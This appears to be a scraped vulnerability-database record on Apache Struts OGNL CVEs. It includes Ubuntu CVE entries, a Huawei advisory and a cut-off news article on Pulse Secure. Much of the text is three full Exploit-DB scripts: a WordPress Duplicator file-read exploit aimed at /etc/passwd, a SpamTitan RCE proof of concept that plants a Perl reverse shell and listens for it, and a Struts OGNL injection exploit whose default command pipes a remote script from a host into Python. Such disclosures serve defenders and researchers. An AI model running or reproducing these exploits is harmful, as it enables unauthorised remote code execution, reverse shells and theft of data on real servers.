Affected software : Apache Struts 2.0.0\n- Struts 2.5.25.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "ubuntucve", "title": "CVE-2020-17530", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-11T00:00:00", "id": "UB:CVE-2020-17530", "href": "https://ubuntu.com/security/CVE-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T13:46:24", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated\non raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T00:00:00", "type": "ubuntucve", "title": 
"CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-09-14T00:00:00", "id": "UB:CVE-2019-0230", "href": "https://ubuntu.com/security/CVE-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-28T13:21:41", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts\n2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double\nevaluation if a developer applied forced OGNL evaluation by using the\n%{...} syntax. 
Using forced OGNL evaluation on untrusted user input can\nlead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "ubuntucve", "title": "CVE-2021-31805", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-12T00:00:00", "id": "UB:CVE-2021-31805", "href": "https://ubuntu.com/security/CVE-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-07-29T19:39:44", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-18T00:00:00", "type": "exploitdb", "title": "Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary 
File Read", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-11738", "CVE-2020-11738"], "modified": "2021-10-18T00:00:00", "id": "EDB-ID:50420", "href": "https://www.exploit-db.com/exploits/50420", "sourceData": "# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read\r\n# Date: October 16, 2021\r\n# Exploit Author: nam3lum\r\n# Vendor Homepage: https://wordpress.org/plugins/duplicator/\r\n# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]\r\n# Version: 1.3.26\r\n# Tested on: Ubuntu 16.04\r\n# CVE : CVE-2020-11738\r\n\r\nimport requests as re\r\nimport sys\r\n\r\nif len(sys.argv) != 3:\r\n print(\"Exploit made by nam3lum.\")\r\n print(\"Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd\")\r\n exit()\r\n\r\narg = sys.argv[1]\r\nfile = sys.argv[2]\r\n\r\nURL = arg + \"/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../..\" + file\r\n\r\noutput = re.get(url = URL)\r\nprint(output.text)", "sourceHref": "https://www.exploit-db.com/raw/50420", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-21T22:46:15", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-05T00:00:00", "type": "exploitdb", "title": "SpamTitan 7.07 - Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-11698", "CVE-2020-11698"], "modified": "2020-10-05T00:00:00", "id": "EDB-ID:48856", "href": "https://www.exploit-db.com/exploits/48856", "sourceData": "# Exploit Title: SpamTitan 7.07 - Unauthenticated Remote Code Execution\r\n# Date: 2020-09-18\r\n# Exploit Author: Felipe Molina (@felmoltor)\r\n# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/\r\n# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway\r\n# Version: 7.07\r\n# Tested on: FreeBSD\r\n# CVE : CVE-2020-11698\r\n\r\n---[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in\r\nsnmp-x.php]------------------------------\r\n\r\nSECURITY ADVISORY: SPUK-2020-09/SpamTitan Unauthenticated Remote\r\nCode Execution in snmp-x.php\r\nAffected Software: SpamTitan Gateway 7.07 (possibly earlier versions)\r\nVulnerability: Unauthenticated Remote Code Execution\r\nCVSSv3: 10.0\r\n(https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\r\nSeverity: Critical\r\nRelease Date: 2020-04-17\r\nCVE: CVE-2020-11698\r\n\r\nI. 
Background\r\n~~~~~~~~~~~~~\r\n\r\nFrom www.spamtitan.com:\r\n\r\n\"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network\r\nadministrators with extensive tools to control mail flow and protect against\r\nunwanted email and malware.\"\r\n\r\nII. Description\r\n~~~~~~~~~~~~~~~\r\nImproper input sanitization of the parameter \"community\" on the page\r\nsnmp-x.php would allow a remote attacker to inject command directives into the\r\nfile snmpd.conf. This would allow executing commands on the target server by\r\nby injecting an \"extend\" or \"exec\" SNMPD directive and querying the snmp daemon\r\nof the server for the correct OID.\r\n\r\nIII. PoC\r\n~~~~~~~~\r\n\r\nUse python 3 and install the following modules: requests, pysnmp.\r\nIf your IP is 192.168.1.5 and the target SpamTitan server is\r\nspamtitan.example.com, call the PoC like this:\r\n./poc.py -t spamtitan.example.com -i 192.168.1.5\r\n\r\n---------------------------------------------\r\n\r\n#!/usr/bin/env python\r\n\r\n# Author: Felipe Molina (@felmoltor)\r\n# Date: 09/04/2020\r\n# Python Version: 3.7\r\n# Summary: This is PoC for an unauthenticated RCE 0day on SpamTitan\r\n7.07 and previous versions.\r\n# The script abuses of two weaknesses on the product:\r\n# 1. Unauthenticated interaction with snmp-x.php script\r\n# 2. Injection of snmpd.conf configuration directives in multiple POST\r\nparameters such as \"community\" or \"user_username\" of snmp-x.php\r\n# Product URL: https://www.spamtitan.com/\r\n# Product Version: 7.07 and probably previous\r\n\r\nimport requests\r\nrequests.packages.urllib3.disable_warnings()\r\nimport os\r\nimport threading\r\nfrom optparse import OptionParser\r\nimport socket\r\nimport json\r\nfrom pysnmp.hlapi import *\r\nfrom urllib.parse import urlparse\r\nfrom time import sleep\r\n\r\nSNMPGETDELAY=5\r\n\r\ndef parseoptions():\r\n parser = OptionParser()\r\n parser.add_option(\"-t\", \"--target\", dest=\"target\",\r\n help=\"Target SpamTitan URL to attack. 
E.g.:\r\nhttps://spamtitan.com/\", default=None)\r\n parser.add_option(\"-i\", \"--ip\", dest=\"ip\",\r\n help=\"Local IP where to listen for the reverse\r\nshell. Default: %s\" % myip(), default=myip())\r\n parser.add_option(\"-p\", \"--port\", dest=\"port\",\r\n help=\"Local Port where to listen for the reverse\r\nshell. Default: 4242\", default=4242)\r\n parser.add_option(\"-q\", \"--quiet\",\r\n action=\"store_true\", dest=\"quiet\", default=False,\r\n help=\"Shut up script! Just give me the shell.\")\r\n\r\n return parser.parse_args()\r\n\r\ndef printmsg(msg,quiet=False,msgtype=\"i\"):\r\n if (not quiet):\r\n if (success):\r\n print(\"[%s] %s\" % (msgtype,msg))\r\n else:\r\n print(\"[-] %s\" % msg)\r\n\r\ndef info(msg,quiet=False):\r\n printmsg(msg,quiet,msgtype=\"i\")\r\n\r\ndef success(msg,quiet=False):\r\n printmsg(msg,quiet,msgtype=\"+\")\r\n\r\ndef fail(msg,quiet=False):\r\n printmsg(msg,quiet,msgtype=\"-\")\r\n\r\ndef myip():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n try:\r\n # doesn't even have to be reachable\r\n s.connect(('10.255.255.255', 1))\r\n IP = s.getsockname()[0]\r\n except:\r\n IP = '127.0.0.1'\r\n finally:\r\n s.close()\r\n return IP\r\n\r\n\r\ndef shellServer(ip,port,quiet):\r\n servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n servers.bind((ip, port))\r\n servers.listen(1)\r\n info(\"Waiting for incoming connection on %s:%s\" % (ip,port))\r\n conn, addr = servers.accept()\r\n conn.settimeout(1)\r\n success(\"Hurray, we got a connection from %s\" % addr[0])\r\n\r\n prompt =conn.recv(128)\r\n prompt=str(prompt.decode(\"utf-8\")).strip()\r\n command = input(prompt)\r\n\r\n while True:\r\n try:\r\n c = \"%s\\n\" % (command)\r\n if (len(c)>0):\r\n conn.sendall(c.encode(\"utf-8\"))\r\n # Quit the console\r\n if command == 'exit':\r\n info(\"\\nClosing connection\")\r\n conn.close()\r\n break\r\n else:\r\n completeanswer=\"\"\r\n while True:\r\n answer=None\r\n try:\r\n 
answer=str((conn.recv(1024)).decode(\"utf-8\"))\r\n completeanswer+=answer\r\n except socket.timeout:\r\n completeanswer.strip()\r\n break\r\n print(completeanswer,end='')\r\n command = input(\"\")\r\n except (KeyboardInterrupt, EOFError):\r\n info(\"\\nClosing connection\")\r\n break\r\n\r\ndef triggerSNMPShell(target, community, triggeroid, port, quiet):\r\n if (not quiet):\r\n print(\"Waiting %s seconds to allow the main thread set-up the\r\nshell listener.\" % SNMPGETDELAY)\r\n # Give the parent thread a few seconds to set up the shell\r\nlistener before triggering the SNMP get query\r\n sleep(SNMPGETDELAY)\r\n if (not quiet):\r\n print(\"Querying the SNMP server to launch the shell.\")\r\n targetp = urlparse(target)\r\n errorIndication, errorStatus, errorIndex, varBinds = next(\r\n getCmd(SnmpEngine(),\r\n CommunityData(community, mpModel=0),\r\n UdpTransportTarget((targetp.netloc, port)),\r\n ContextData(),\r\n ObjectType(ObjectIdentity(triggeroid)))\r\n )\r\n if errorIndication:\r\n print(\"SNMP error: %s\" % errorIndication)\r\n elif errorStatus:\r\n print('SNMP error status: %s at %s' % (errorStatus.prettyPrint(),\r\n errorIndex and varBinds[int(errorIndex) -\r\n1][0] or '?'))\r\n\r\ndef main():\r\n (options,arguments) = parseoptions()\r\n q = options.quiet\r\n t = options.target\r\n i = options.ip\r\n p = options.port\r\n community=\"dummy\"\r\n\r\n if (t is None):\r\n print(\"[-] Error. 
Specify a target (-t).\")\r\n exit()\r\n\r\n if ((not \"http://\" in t) and (not \"https://\" in t)):\r\n t = \"http://%s/snmp-x.php\" % t\r\n else:\r\n t = \"%s/snmp-x.php\" % t\r\n\r\n if (not q):\r\n print(\"[+] Attacking: %s.\\nReceiving shell in %s:%s\" % (t,i,p))\r\n\r\n TARGETOID=\".1.3.6.1.4.1.8072.1.3.2.3.1.1.8.114.101.118.115.104.101.108.108\"\r\n # PAYLOAD=\"extend revshell /usr/bin/perl -e 'use\r\nSocket;$i=\\\"%s\\\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh\r\n-i\\\");};'\" % (i,p)\r\n PAYLOAD=\"extend revshell /usr/bin/perl -e 'use\r\nSocket;$i=\\\"%s\\\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh\r\n-i\\\");};'\" % (i,p)\r\n TOGGLESNMP={\r\n \"jaction\":\"toggleSNMP\",\r\n \"newval\":\"1\"\r\n }\r\n INJECTION={\r\n \"jaction\":\"saveAll\",\r\n \"contact\":\"CONTACT\",\r\n \"name\":\"SpamTitan\",\r\n \"location\":\"LOCATION\",\r\n # Add our IP as allowed to query the injected \"dummy\" community\r\n # Add also the perl payload in a new line (%0a) of the snmpd.conf file\r\n \"community\":'%s\" %s\\n%s # ' % (community,i,PAYLOAD)\r\n }\r\n\r\n rev_thread = threading.Thread(target=triggerSNMPShell, args=(t,\r\ncommunity, TARGETOID, 161,q))\r\n rev_thread.start()\r\n\r\n # Start a thread to listen for incoming reverse shells:\r\n if (not q):\r\n print(\"[+] Launching a reverse shell listener to wait for the shell.\")\r\n\r\n # Send the SNMP request to add a community and append an \"extend\"\r\ncommand to execute scripts\r\n # SpamTitan would add a new line in the snmpd.conf file with the\r\nnew community name and the \"extend\" script\r\n inj_res = requests.post(t,INJECTION,verify=False)\r\n if (inj_res.status_code == 200):\r\n if (not q):\r\n 
print(\"Spawning a reverse shell listener. Wait for it...\")\r\n shellServer(options.ip,int(options.port),options.quiet)\r\n else:\r\n print(\"Error. The target is probably not vulnerable (returned\r\na %s code).\" % inj_res.status_code)\r\n\r\nmain()\r\n\r\n---------------------------------------------\r\n\r\nIV. Impact\r\n~~~~~~~~~~\r\n\r\nThe snmpd daemon is running as root on the target server. The\r\npresented PoC would return a root shell without needing any\r\nregistered user on the target server. There is total loss of\r\nconfidentiality, integrity and availability on the SpamTitan server.\r\n\r\nV. Disclosure\r\n~~~~~~~~~~~~~\r\n\r\nReported By: Felipe Molina de la Torre\r\n\r\nVendor Informed: 2020-04-17\r\nPatch Release Date: 2020-05-26\r\nAdvisory Release Date: 2019-09-18\r\n\r\nVI. References\r\n~~~~~~~~~~~~~~\r\n* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698\r\n* https://sensepost.com/blog/2020/clash-of-the-spamtitan/\r\n\r\n---------------------------------[SPUK-2020-09/SpamTitan\r\nUnauthenticated Remote Code Execution in snmp-x.php]---", "sourceHref": "https://www.exploit-db.com/raw/48856", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T15:47:32", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-17T00:00:00", "type": "exploitdb", "title": "Apache Struts 2.5.20 - Double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-0230", "CVE-2019-0230", "CVE-2020-0230"], "modified": "2020-11-17T00:00:00", "id": "EDB-ID:49068", "href": "https://www.exploit-db.com/exploits/49068", "sourceData": "# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation\r\n# Date: 08/18/2020\r\n# Exploit Author: West Shepherd\r\n# Vendor Homepage: https://struts.apache.org/download.cgi\r\n# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)\r\n# CVE : CVE-2019-0230\r\n# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.\r\n# Source(s):\r\n# https://github.com/PrinceFPF/CVE-2019-0230\r\n# https://cwiki.apache.org/confluence/display/WW/S2-059\r\n# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22\r\n\r\n# !/usr/bin/python\r\nfrom sys import argv, exit, stdout, stderr\r\nimport argparse\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nimport logging\r\n\r\n\r\nclass Exploit:\r\n def __init__(\r\n self,\r\n target='',\r\n redirect=False,\r\n proxy_address=''\r\n ):\r\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n self.target = target\r\n self.session = requests.session()\r\n self.redirect = redirect\r\n self.timeout = 0.5\r\n self.proxies = {\r\n 'http': 'http://%s' % proxy_address,\r\n 'https': 'http://%s' % proxy_address\r\n } \\\r\n if proxy_address is not None \\\r\n and proxy_address != '' else {}\r\n self.query_params = {}\r\n self.form_values = {}\r\n self.cookies = {}\r\n boundary = \"---------------------------735323031399963166993862150\"\r\n self.headers = {\r\n 'Content-Type': 
'multipart/form-data; boundary=%s' % boundary,\r\n 'Accept': '*/*',\r\n 'Connection': 'close'\r\n }\r\n payload = \"%{(#nike='multipart/form-data').\" \\\r\n \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \\\r\n \"(#_memberAccess?(#_memberAccess=#dm):\" \\\r\n\r\n\"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n\\\r\n\r\n\"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\"\r\n\\\r\n \"(#ognlUtil.getExcludedPackageNames().clear()).\" \\\r\n \"(#ognlUtil.getExcludedClasses().clear()).\" \\\r\n \"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').\" \\\r\n\r\n\"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\"\r\n\\\r\n\r\n\"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \\\r\n \"(#p=new\r\njava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).\" \\\r\n\r\n\"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\"\r\n\\\r\n\r\n\"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\"\r\n\\\r\n \"(#ros.flush())}\"\r\n\r\n self.payload = \"--%s\\r\\nContent-Disposition: form-data;\r\nname=\\\"foo\\\"; \" \\\r\n \"filename=\\\"%s\\0b\\\"\\r\\nContent-Type:\r\ntext/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % (\r\n boundary, payload, boundary\r\n )\r\n\r\n def do_get(self, url, params=None, data=None):\r\n return self.session.get(\r\n url=url,\r\n verify=False,\r\n allow_redirects=self.redirect,\r\n headers=self.headers,\r\n cookies=self.cookies,\r\n proxies=self.proxies,\r\n data=data,\r\n params=params\r\n )\r\n\r\n def do_post(self, url, data=None, params=None):\r\n return self.session.post(\r\n url=url,\r\n data=data,\r\n verify=False,\r\n allow_redirects=self.redirect,\r\n headers=self.headers,\r\n cookies=self.cookies,\r\n proxies=self.proxies,\r\n params=params\r\n )\r\n\r\n def debug(self):\r\n try:\r\n import http.client as http_client\r\n except 
ImportError:\r\n import httplib as http_client\r\n http_client.HTTPConnection.debuglevel = 1\r\n logging.basicConfig()\r\n logging.getLogger().setLevel(logging.DEBUG)\r\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\r\n requests_log.setLevel(logging.DEBUG)\r\n requests_log.propagate = True\r\n return self\r\n\r\n def send_payload(self, command='curl --insecure -sv\r\nhttps://10.10.10.10/shell.py|python -'):\r\n url = self.target\r\n stdout.write('sending payload to %s payload %s' % (url, command))\r\n resp = self.do_post(url=url, params=self.query_params,\r\ndata=self.payload.replace('{COMMAND}', command))\r\n return resp\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(add_help=True,\r\n description='CVE-2020-0230 Struts\r\n2 exploit')\r\n try:\r\n parser.add_argument('-target', action='store', help='Target\r\naddress: http(s)://target.com/index.action')\r\n parser.add_argument('-command', action='store',\r\n help='Command to execute: touch /tmp/pwn')\r\n parser.add_argument('-debug', action='store', default=False,\r\nhelp='Enable debugging: False')\r\n parser.add_argument('-proxy', action='store', default='',\r\nhelp='Enable proxy: 10.10.10.10:8080')\r\n\r\n if len(argv) == 1:\r\n parser.print_help()\r\n exit(1)\r\n options = parser.parse_args()\r\n\r\n exp = Exploit(\r\n proxy_address=options.proxy,\r\n target=options.target\r\n )\r\n\r\n if options.debug:\r\n exp.debug()\r\n stdout.write('target %s debug %s proxy %s\\n' % (\r\n options.target, options.debug, options.proxy\r\n ))\r\n\r\n result = exp.send_payload(command=options.command)\r\n stdout.write('Response: %d\\n' % result.status_code)\r\n\r\n except Exception as error:\r\n\r\nstderr.write('error in main %s' % str(error))", "sourceHref": "https://www.exploit-db.com/raw/49068", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "huawei": [{"lastseen": "2023-06-13T14:27:00", "description": "The Apache Struts frameworks, when forced, performs 
double evaluation of attributes' values assigned to certain tag attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution. The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request. (Vulnerability ID: HWPSIRT-2020-49789)\n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2019-0230.\n\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\n\n[http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200902-01-struts2-en](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200902-01-struts2-en>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-02T00:00:00", "type": "huawei", "title": "Security Advisory - Remote Code Execution vulnerability in Apache Struts2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-02-10T00:00:00", "id": "HUAWEI-SA-20200902-01-STRUTS2", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-01-struts2-en", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:15", "description": "Pulse Secure has shipped a fix for a critical post-authentication remote code execution (RCE) vulnerability in its Connect Secure virtual private network (VPN) appliances to address an incomplete patch for an actively exploited flaw it previously resolved in October 2020.\n\n\"The Pulse Connect Secure appliance suffers from an uncontrolled archive extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root,\" NCC Group's Richard Warren [disclosed](<https://research.nccgroup.com/2021/08/05/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-archive-extraction-cve-2021-22937-patch-bypass/>) on Friday. 
\"This vulnerability is a bypass of the patch for [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>).\"\n\n\"An attacker with such access will be able to circumvent any restrictions enforced via the web application, as well as remount the filesystem, allowing them to create a persistent backdoor, extract and decrypt credentials, compromise VPN clients, or pivot into the internal network,\" Warren added.\n\nThe disclosure comes days after Ivanti, the company behind Pulse Secure, [published an advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) for as many as six security vulnerabilities on August 2, urging customers to move quickly to update to Pulse Connect Secure version 9.1R12 to secure against any exploitation attempts targeting the flaws.\n\nTracked as CVE-2021-22937 (CVSS score: 9.1), the shortcoming could \"allow an authenticated administrator to perform a file write via a maliciously crafted archive uploaded in the administrator web interface,\" according to Pulse Secure. CVE-2020-8260 (CVSS score: 7.2), which concerns an arbitrary code execution flaw using uncontrolled gzip extraction, was [remediated](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) in October 2020 with version 9.1R9.\n\n\"CVE-2021-2293 is a separate vulnerability and is not a bypass of CVE-2020-8260, but is similar in terms of impact and vulnerability type, which is why we assigned a separate CVE,\" Daniel Spicer, Ivanti's vice president of security, said in a statement to The Hacker News.\n\nThe vulnerability is due to a flaw in the way that archive files (.TAR) are extracted in the administrator web interface. 
